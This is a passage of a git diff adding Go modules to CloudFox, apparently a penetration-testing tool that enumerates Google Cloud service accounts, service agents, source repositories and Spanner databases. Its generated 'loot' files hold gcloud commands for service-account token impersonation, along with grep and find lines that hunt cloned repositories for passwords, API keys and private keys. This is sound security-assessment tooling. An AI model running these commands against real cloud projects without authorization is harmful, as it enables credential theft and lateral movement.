userKeyCount := 0 + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ + } + } + if userKeyCount > 0 { + keyCount = fmt.Sprintf("%d", userKeyCount) + } + + // Build IAM bindings from impersonation info + // One row per IAM binding (member + role type) + hasBindings := false + if sa.ImpersonationInfo != nil { + // Token creators can get access tokens + for _, member := range sa.ImpersonationInfo.TokenCreators { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "TokenCreator", + member, + }) + } + } + // Key creators can create keys + for _, member := range sa.ImpersonationInfo.KeyCreators { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "KeyAdmin", + member, + }) + } + } + // ActAs users can impersonate + for _, member := range sa.ImpersonationInfo.ActAsUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "ActAs", + member, + }) + } + } + // SA Admins have full control + for _, member := range sa.ImpersonationInfo.SAAdmins { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SAAdmin", + member, + }) + } + } + // SignBlob users + for _, member := range sa.ImpersonationInfo.SignBlobUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SignBlob", + member, + }) + } + } + // SignJwt users + for _, member := range sa.ImpersonationInfo.SignJwtUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SignJwt", + member, + }) + } + } + } + + // If no IAM bindings, still show the SA with empty IAM columns + if !hasBindings { + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "-", + "-", + }) + } + } + + // Collect loot files (only non-empty ones) + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables - just one table now + tables := []internal.TableFile{ + { + Name: "serviceaccounts", + Header: saHeader, + Body: saBody, + }, + } + + output := ServiceAccountsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// extractEmailFromMember extracts the email/identity from an IAM member string +// e.g., "user:alice@example.com" -> "alice@example.com" +// e.g., "serviceAccount:sa@project.iam.gserviceaccount.com" -> "sa@project.iam..." +func extractEmailFromMember(member string) string { + if idx := strings.Index(member, ":"); idx != -1 { + return member[idx+1:] + } + return member +} diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go new file mode 100644 index 00000000..f44c6d97 --- /dev/null +++ b/gcp/commands/serviceagents.go @@ -0,0 +1,271 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + serviceagentsservice "github.com/BishopFox/cloudfox/gcp/services/serviceAgentsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAgentsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Aliases: []string{"agents", "service-accounts-google", "gcp-agents"}, + Short: "Enumerate Google-managed service agents", + Long: `Enumerate Google-managed service agents and their permissions. + +Service agents are Google-managed service accounts that operate on behalf +of GCP services. Understanding them helps identify: +- Hidden access paths to resources +- Cross-project service agent access +- Overprivileged service agents +- Potential lateral movement via service agent impersonation + +Common Service Agents: +- Cloud Build Service Account (@cloudbuild.gserviceaccount.com) +- Compute Engine Service Agent (@compute-system.iam.gserviceaccount.com) +- GKE Service Agent (@container-engine-robot.iam.gserviceaccount.com) +- Cloud Run/Functions (@serverless-robot-prod.iam.gserviceaccount.com) +- Cloud SQL Service Agent (@gcp-sa-cloud-sql.iam.gserviceaccount.com) + +Security Considerations: +- Service agents often have broad permissions +- Cross-project agents indicate shared service access +- Cloud Build SA is a common privilege escalation vector +- Default compute SA often has Editor role`, + Run: runGCPServiceAgentsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ServiceAgentsModule struct { + gcpinternal.BaseGCPModule + + Agents []serviceagentsservice.ServiceAgentInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ServiceAgentsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAgentsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAgentsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEAGENTS_MODULE_NAME) + if err != nil { + return + } + + module := &ServiceAgentsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Agents: []serviceagentsservice.ServiceAgentInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) + + if len(m.Agents) == 0 { + logger.InfoM("No service agents found", globals.GCP_SERVICEAGENTS_MODULE_NAME) + return + } + + // Count cross-project agents + crossProjectCount := 0 + for _, agent := range m.Agents { + if agent.IsCrossProject { + crossProjectCount++ + } + } + + if crossProjectCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s) (%d cross-project)", len(m.Agents), crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(m.Agents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service agents in project: %s", projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + svc := serviceagentsservice.New() + agents, err := svc.GetServiceAgents(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting service agents: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Agents = append(m.Agents, agents...) + + for _, agent := range agents { + m.addAgentToLoot(agent) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service agent(s) in project %s", len(agents), projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAgentsModule) initializeLootFiles() { + m.LootMap["serviceagents-commands"] = &internal.LootFile{ + Name: "serviceagents-commands", + Contents: "# Service Agents Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ServiceAgentsModule) addAgentToLoot(agent serviceagentsservice.ServiceAgentInfo) { + crossProjectNote := "" + if agent.IsCrossProject { + crossProjectNote = " [CROSS-PROJECT]" + } + + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SERVICE AGENT: %s%s (Project: %s)\n"+ + "# ==========================================\n"+ + "# Email: %s\n"+ + "# Description: %s\n", + agent.ServiceName, crossProjectNote, agent.ProjectID, + agent.Email, agent.Description, + ) + + if len(agent.Roles) > 0 { + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf("# Roles: %s\n", strings.Join(agent.Roles, ", ")) + } + + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf( + "\n# Get IAM policy for project:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s' --format='table(bindings.role)'\n"+ + "# Test impersonation (requires iam.serviceAccounts.getAccessToken):\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + agent.ProjectID, agent.Email, + agent.Email, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main agents table - one row per role + header := []string{ + "Project Name", + "Project ID", + "Service", + "Email", + "Role", + "Cross-Project", + } + + var body [][]string + for _, agent := range m.Agents { + crossProject := "No" + if agent.IsCrossProject { + crossProject = "Yes" + } + + // One row per role + if len(agent.Roles) > 0 { + for _, role := range agent.Roles { + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ProjectID, + agent.ServiceName, + agent.Email, + role, + crossProject, + }) + } + } else { + // Agent with no roles + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ProjectID, + agent.ServiceName, + agent.Email, + "-", + crossProject, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := ServiceAgentsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go new file mode 100644 index 00000000..175b70e1 --- /dev/null +++ b/gcp/commands/sourcerepos.go @@ -0,0 +1,298 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + sourcereposservice "github.com/BishopFox/cloudfox/gcp/services/sourceReposService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSourceReposCommand = &cobra.Command{ + Use: globals.GCP_SOURCEREPOS_MODULE_NAME, + Aliases: []string{"repos", "csr", "git"}, + Short: "Enumerate Cloud Source Repositories", + Long: `Enumerate Cloud Source Repositories for code and secrets. + +Cloud Source Repositories can contain: +- Application source code +- Infrastructure as Code (Terraform, CloudFormation) +- Configuration files with hardcoded credentials +- API keys and secrets in code +- CI/CD pipeline configurations + +Output: +- List of all repositories accessible +- Repository sizes and mirror configurations +- Clone commands for each repository +- Secret search commands + +After cloning, search for: +- Hardcoded credentials and API keys +- Private keys and certificates +- Environment configuration files +- Database connection strings`, + Run: runGCPSourceReposCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SourceReposModule struct { + gcpinternal.BaseGCPModule + + Repos []sourcereposservice.RepoInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SourceReposOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SourceReposOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SourceReposOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSourceReposCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SOURCEREPOS_MODULE_NAME) + if err != nil { + return + } + + module := &SourceReposModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Repos: []sourcereposservice.RepoInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SourceReposModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SOURCEREPOS_MODULE_NAME, m.processProject) + + if len(m.Repos) == 0 { + logger.InfoM("No Cloud Source Repositories found", globals.GCP_SOURCEREPOS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d repository(ies)", len(m.Repos)), globals.GCP_SOURCEREPOS_MODULE_NAME) + logger.InfoM("[PENTEST] Clone repositories and search for secrets!", globals.GCP_SOURCEREPOS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SourceReposModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Source Repositories in project: %s", projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } + + svc := sourcereposservice.New() + repos, err := svc.ListRepos(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SOURCEREPOS_MODULE_NAME, + fmt.Sprintf("Could not list repos in project %s", projectID)) + return + } + + m.mu.Lock() + m.Repos = append(m.Repos, repos...) + + for _, repo := range repos { + m.addRepoToLoot(repo) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) in project %s", len(repos), projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SourceReposModule) initializeLootFiles() { + m.LootMap["sourcerepos-commands"] = &internal.LootFile{ + Name: "sourcerepos-commands", + Contents: "# Cloud Source Repository Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SourceReposModule) addRepoToLoot(repo sourcereposservice.RepoInfo) { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# REPOSITORY: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n", + repo.Name, repo.ProjectID, + ) + + if repo.Size > 0 { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) + } + if repo.MirrorConfig { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) + } + if repo.PubsubConfigs > 0 { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Pub/Sub Triggers: %d\n", repo.PubsubConfigs) + } + + // IAM bindings summary + if len(repo.IAMBindings) > 0 { + m.LootMap["sourcerepos-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range repo.IAMBindings { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf( + "\n# Clone repository:\n"+ + "gcloud source repos clone %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud source repos get-iam-policy %s --project=%s\n\n"+ + "# Search for secrets after cloning:\n"+ + "cd %s && grep -rE '(password|secret|api[_-]?key|private[_-]?key|AWS_|GOOGLE_|token)' . --include='*'\n"+ + "find . -name '*.pem' -o -name '*.key' -o -name '.env*' -o -name '*credential*' -o -name '*.tfvars'\n"+ + "grep -rE 'BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY' .\n\n", + repo.Name, repo.ProjectID, + repo.Name, repo.ProjectID, + repo.Name, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Repos table - one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Size", + "Mirror", + "Mirror URL", + "Triggers", + "IAM Role", + "IAM Member", + } + + var body [][]string + for _, repo := range m.Repos { + sizeDisplay := "-" + if repo.Size > 0 { + if repo.Size > 1024*1024 { + sizeDisplay = fmt.Sprintf("%.1f MB", float64(repo.Size)/(1024*1024)) + } else if repo.Size > 1024 { + sizeDisplay = fmt.Sprintf("%.1f KB", float64(repo.Size)/1024) + } else { + sizeDisplay = fmt.Sprintf("%d B", repo.Size) + } + } + + mirror := "No" + mirrorURL := "-" + if repo.MirrorConfig { + mirror = "Yes" + mirrorURL = repo.MirrorURL + } + + triggers := "-" + if repo.PubsubConfigs > 0 { + triggers = fmt.Sprintf("%d", repo.PubsubConfigs) + } + + // One row per IAM binding + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.ProjectID, + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + binding.Role, + binding.Member, + }) + } + } else { + // Repo with no IAM bindings + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.ProjectID, + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "source-repos", + Header: header, + Body: body, + }, + } + + output := SourceReposOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go new file mode 100644 index 00000000..92bdb1e4 --- /dev/null +++ b/gcp/commands/spanner.go @@ -0,0 +1,323 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSpannerCommand = &cobra.Command{ + Use: globals.GCP_SPANNER_MODULE_NAME, + Aliases: []string{"cloud-spanner"}, + Short: "Enumerate Cloud Spanner instances and databases", + Long: `Enumerate Cloud Spanner instances and databases with IAM bindings. + +Features: +- Lists all Spanner instances with configuration details +- Shows databases within each instance with encryption info +- Enumerates IAM bindings at both instance and database levels +- Generates gcloud commands for further analysis`, + Run: runGCPSpannerCommand, +} + +type SpannerModule struct { + gcpinternal.BaseGCPModule + Instances []spannerservice.SpannerInstanceInfo + Databases []spannerservice.SpannerDatabaseInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type SpannerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SpannerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SpannerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPSpannerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SPANNER_MODULE_NAME) + if err != nil { + return + } + + module := &SpannerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []spannerservice.SpannerInstanceInfo{}, + Databases: []spannerservice.SpannerDatabaseInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *SpannerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNER_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Spanner instances found", globals.GCP_SPANNER_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Spanner instance(s) with %d database(s)", + len(m.Instances), len(m.Databases)), globals.GCP_SPANNER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *SpannerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Spanner in project: %s", projectID), globals.GCP_SPANNER_MODULE_NAME) + } + + svc := spannerservice.New() + result, err := svc.ListInstancesAndDatabases(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNER_MODULE_NAME, + fmt.Sprintf("Could not list Spanner instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, result.Instances...) + m.Databases = append(m.Databases, result.Databases...) + + for _, instance := range result.Instances { + m.addInstanceToLoot(instance) + } + for _, database := range result.Databases { + m.addDatabaseToLoot(database) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) and %d database(s) in project %s", + len(result.Instances), len(result.Databases), projectID), globals.GCP_SPANNER_MODULE_NAME) + } +} + +func (m *SpannerModule) initializeLootFiles() { + m.LootMap["spanner-commands"] = &internal.LootFile{ + Name: "spanner-commands", + Contents: "# Spanner Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SpannerModule) addInstanceToLoot(instance spannerservice.SpannerInstanceInfo) { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# INSTANCE: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Config: %s\n"+ + "# Nodes: %d\n"+ + "# State: %s\n", + instance.Name, instance.ProjectID, + instance.DisplayName, instance.Config, + instance.NodeCount, instance.State, + ) + + if len(instance.IAMBindings) > 0 { + m.LootMap["spanner-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range instance.IAMBindings { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud spanner instances describe %s --project=%s\n\n"+ + "# List databases:\n"+ + "gcloud spanner databases list --instance=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud spanner instances get-iam-policy %s --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) +} + +func (m *SpannerModule) addDatabaseToLoot(database spannerservice.SpannerDatabaseInfo) { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# DATABASE: %s (Instance: %s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# State: %s\n"+ + "# Encryption: %s\n", + database.Name, database.InstanceName, + database.ProjectID, database.State, + database.EncryptionType, + ) + + if database.KmsKeyName != "" { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", database.KmsKeyName) + } + + if len(database.IAMBindings) > 0 { + m.LootMap["spanner-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range database.IAMBindings { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "\n# Describe database:\n"+ + "gcloud spanner databases describe %s --instance=%s --project=%s\n\n"+ + "# Get database IAM policy:\n"+ + "gcloud spanner databases get-iam-policy %s --instance=%s --project=%s\n\n"+ + "# Execute SQL query:\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM INFORMATION_SCHEMA.TABLES\"\n\n", + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + ) +} + +func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Instance table - one row per IAM binding + instanceHeader := []string{ + "Project Name", + "Project ID", + "Instance", + "Display Name", + "Config", + "Nodes", + "State", + "IAM Role", + "IAM Member", + } + + var instanceBody [][]string + for _, instance := range m.Instances { + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + binding.Role, + binding.Member, + }) + } + } else { + // Instance with no IAM bindings + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + "-", + "-", + }) + } + } + + // Database table - one row per IAM binding + databaseHeader := []string{ + "Project Name", + "Project ID", + "Instance", + "Database", + "State", + "Encryption", + "KMS Key", + "IAM Role", + "IAM Member", + } + + var databaseBody [][]string + for _, database := range m.Databases { + kmsKey := "-" + if database.KmsKeyName != "" { + kmsKey = database.KmsKeyName + } + + if len(database.IAMBindings) > 0 { + for _, binding := range database.IAMBindings { + databaseBody = append(databaseBody, []string{ + m.GetProjectName(database.ProjectID), + database.ProjectID, + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + binding.Role, + binding.Member, + }) + } + } else { + // Database with no IAM bindings + databaseBody = append(databaseBody, []string{ + m.GetProjectName(database.ProjectID), + database.ProjectID, + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "spanner-instances", + Header: instanceHeader, + Body: instanceBody, + }, + } + + if len(databaseBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "spanner-databases", + Header: databaseHeader, + Body: databaseBody, + }) + } + + output := SpannerOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SPANNER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go new file mode 100644 index 00000000..934f31eb --- /dev/null +++ b/gcp/commands/vpcnetworks.go @@ -0,0 +1,367 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + vpcservice "github.com/BishopFox/cloudfox/gcp/services/vpcService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPVPCNetworksCommand = &cobra.Command{ + Use: globals.GCP_VPCNETWORKS_MODULE_NAME, + Aliases: []string{"vpc", "networks", "net"}, + Short: "Enumerate VPC Networks", + Long: `Enumerate VPC Networks and related configurations. + +Features: +- Lists all VPC networks and subnets +- Shows VPC peering connections +- Analyzes routing tables +- Checks for Private Google Access +- Identifies flow log configuration`, + Run: runGCPVPCNetworksCommand, +} + +type VPCNetworksModule struct { + gcpinternal.BaseGCPModule + Networks []vpcservice.VPCNetworkInfo + Subnets []vpcservice.SubnetInfo + Peerings []vpcservice.VPCPeeringInfo + Routes []vpcservice.RouteInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type VPCNetworksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + 